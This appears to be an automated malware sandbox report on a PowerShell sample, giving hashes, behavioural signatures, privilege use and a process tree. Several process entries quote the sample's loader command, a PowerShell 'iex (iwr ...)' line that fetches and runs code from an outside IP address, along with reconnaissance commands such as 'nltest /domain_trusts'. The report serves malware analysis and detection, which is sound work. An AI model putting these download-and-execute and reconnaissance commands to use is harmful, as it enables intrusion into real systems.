Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2023 08:07
Static task
static1
Behavioral task
behavioral1
Sample
download.dat (1).ps1
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
download.dat (1).ps1
Resource
win10v2004-20230220-en
General
-
Target
download.dat (1).ps1
-
Size
3KB
-
MD5
9f3b3f3c8e27fd5a3b6da453ea05ab64
-
SHA1
bb091298a548a7e6415908200bcafaa46f4a2a1d
-
SHA256
e256710a69172b77abe095ad5dc4b7b900f306da16c8a34f994b51d503037c68
-
SHA512
4b7c7c48589f54132dcbc047a19dc827a2983e9c5c8aa0e5c8d596af05e0e486b7ca2f96d795c197591ba1c27121983d8811be3177bef2492cc3439d143d6661
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid process 184 552 powershell.exe 223 552 powershell.exe 449 3852 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1908 powershell.exe 1908 powershell.exe 552 powershell.exe 552 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exewhoami.exedescription pid process Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 4620 whoami.exe Token: SeIncreaseQuotaPrivilege 1908 powershell.exe Token: SeSecurityPrivilege 1908 powershell.exe Token: SeTakeOwnershipPrivilege 1908 powershell.exe Token: SeLoadDriverPrivilege 1908 powershell.exe Token: SeSystemProfilePrivilege 1908 powershell.exe Token: SeSystemtimePrivilege 1908 powershell.exe Token: SeProfSingleProcessPrivilege 1908 powershell.exe Token: SeIncBasePriorityPrivilege 1908 powershell.exe Token: SeCreatePagefilePrivilege 1908 powershell.exe Token: SeBackupPrivilege 1908 powershell.exe Token: SeRestorePrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeSystemEnvironmentPrivilege 1908 powershell.exe Token: SeRemoteShutdownPrivilege 1908 powershell.exe Token: SeUndockPrivilege 1908 powershell.exe Token: SeManageVolumePrivilege 1908 powershell.exe Token: 33 1908 powershell.exe Token: 34 1908 powershell.exe Token: 35 1908 powershell.exe Token: 36 1908 powershell.exe Token: SeIncreaseQuotaPrivilege 1908 powershell.exe Token: SeSecurityPrivilege 1908 powershell.exe Token: SeTakeOwnershipPrivilege 1908 powershell.exe Token: SeLoadDriverPrivilege 1908 powershell.exe Token: SeSystemProfilePrivilege 1908 powershell.exe Token: SeSystemtimePrivilege 1908 powershell.exe Token: SeProfSingleProcessPrivilege 1908 powershell.exe Token: SeIncBasePriorityPrivilege 1908 powershell.exe Token: SeCreatePagefilePrivilege 1908 powershell.exe Token: SeBackupPrivilege 1908 powershell.exe Token: SeRestorePrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeSystemEnvironmentPrivilege 1908 powershell.exe Token: SeRemoteShutdownPrivilege 1908 powershell.exe Token: SeUndockPrivilege 1908 powershell.exe Token: SeManageVolumePrivilege 1908 powershell.exe Token: 33 1908 powershell.exe Token: 34 1908 powershell.exe Token: 35 1908 powershell.exe Token: 36 1908 powershell.exe Token: SeIncreaseQuotaPrivilege 1908 powershell.exe Token: SeSecurityPrivilege 1908 powershell.exe Token: SeTakeOwnershipPrivilege 1908 powershell.exe Token: SeLoadDriverPrivilege 1908 powershell.exe Token: SeSystemProfilePrivilege 1908 powershell.exe Token: SeSystemtimePrivilege 1908 powershell.exe Token: SeProfSingleProcessPrivilege 1908 powershell.exe Token: SeIncBasePriorityPrivilege 1908 powershell.exe Token: SeCreatePagefilePrivilege 1908 powershell.exe Token: SeBackupPrivilege 1908 powershell.exe Token: SeRestorePrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1908 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeSystemEnvironmentPrivilege 1908 powershell.exe Token: SeRemoteShutdownPrivilege 1908 powershell.exe Token: SeUndockPrivilege 1908 powershell.exe Token: SeManageVolumePrivilege 1908 powershell.exe Token: 33 1908 powershell.exe Token: 34 1908 powershell.exe Token: 35 1908 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
powershell.exeWScript.exepowershell.exeWScript.exedescription pid process target process PID 1908 wrote to memory of 4620 1908 powershell.exe whoami.exe PID 1908 wrote to memory of 4620 1908 powershell.exe whoami.exe PID 4868 wrote to memory of 552 4868 WScript.exe powershell.exe PID 4868 wrote to memory of 552 4868 WScript.exe powershell.exe PID 552 wrote to memory of 916 552 powershell.exe whoami.exe PID 552 wrote to memory of 916 552 powershell.exe whoami.exe PID 552 wrote to memory of 2488 552 powershell.exe systeminfo.exe PID 552 wrote to memory of 2488 552 powershell.exe systeminfo.exe PID 552 wrote to memory of 1148 552 powershell.exe whoami.exe PID 552 wrote to memory of 1148 552 powershell.exe whoami.exe PID 552 wrote to memory of 900 552 powershell.exe nltest.exe PID 552 wrote to memory of 900 552 powershell.exe nltest.exe PID 552 wrote to memory of 2688 552 powershell.exe tasklist.exe PID 552 wrote to memory of 2688 552 powershell.exe tasklist.exe PID 3688 wrote to memory of 3852 3688 WScript.exe powershell.exe PID 3688 wrote to memory of 3852 3688 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\download.dat (1).ps1"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A4B08A4C065E1870.vbs" "iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe"3⤵
-
C:\Windows\system32\systeminfo.exe"C:\Windows\system32\systeminfo.exe"3⤵
- Gathers system information
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵
-
C:\Windows\system32\nltest.exe"C:\Windows\system32\nltest.exe" /domain_trusts3⤵
-
C:\Windows\system32\tasklist.exe"C:\Windows\system32\tasklist.exe"3⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A4B08A4C065E1870.vbs" "iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.65.42.223/r/alf/109EBD88FBB0136F)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5b01317fecab417a8f8834d3f321d65b1
SHA13595feb8be6e1d08eb627a8eb484c9bfbbf04fa0
SHA256d37d947901849c2b0c0c08cb526743a74d2394c361eb4dfc4099a8dd843f0740
SHA51279054366b76191c3c11260472b6a36eebabafd2702933b8250520492a35a49542c9eeb2b3d1aa135357510e57af7c2c1d9427943bdb792724875e7fdbf3a3330
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\A4B08A4C065E1870.vbsFilesize
106B
MD529814eb775761c5088028d1907f48c55
SHA1cb369ec71c0a44b9b9411edf956efbb5654ab26e
SHA256ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db
SHA512a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5de04e5ee27689426403ff515cae963a3
SHA1fa602fc72c83017c6d9eaebc492035e6d0d86974
SHA256a62e70b1df753ec520d38c9a0fbfda6e4ea366a70b69da5ea588885429afc133
SHA512b847a6fb8a224c78b6408ffef42c88081269a039915edfbfb4e4e6f5ab1adbbd0bcf5ae30c3169169379e6fdc0f5796f0749818206cd73c3cc4b6b20b4db47f1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56084e8c7ac2fac68f21551c50f0d908a
SHA18559dccbfc9075308eda76c845304dd653347988
SHA2568054e65a47cf3a82d662cf7131949abf443f1962874fec947af9b2ca21ad0572
SHA5121d4894dd8d998cbb3dd81a07680ee55acd7e817ee89954600e908dcc6cb85c5aecb20c6dc05ced5e1b4cd2d2f5d1d9e710bbcaf2720c1f3aa05e00e7ad5c09b8
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aq5oorpv.sbc.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/552-165-0x00000289602B0000-0x0000028960472000-memory.dmpFilesize
1.8MB
-
memory/552-163-0x000002895FBF0000-0x000002895FC00000-memory.dmpFilesize
64KB
-
memory/552-162-0x000002895FBF0000-0x000002895FC00000-memory.dmpFilesize
64KB
-
memory/552-164-0x000002895FBF0000-0x000002895FC00000-memory.dmpFilesize
64KB
-
memory/1908-147-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmpFilesize
64KB
-
memory/1908-145-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmpFilesize
64KB
-
memory/1908-143-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmpFilesize
64KB
-
memory/1908-144-0x0000014AFE9C0000-0x0000014AFE9D0000-memory.dmpFilesize
64KB
-
memory/1908-142-0x0000014AFF3B0000-0x0000014AFF3D2000-memory.dmpFilesize
136KB
-
memory/3852-177-0x000001FCADE90000-0x000001FCADEA0000-memory.dmpFilesize
64KB
-
memory/3852-178-0x000001FCADE90000-0x000001FCADEA0000-memory.dmpFilesize
64KB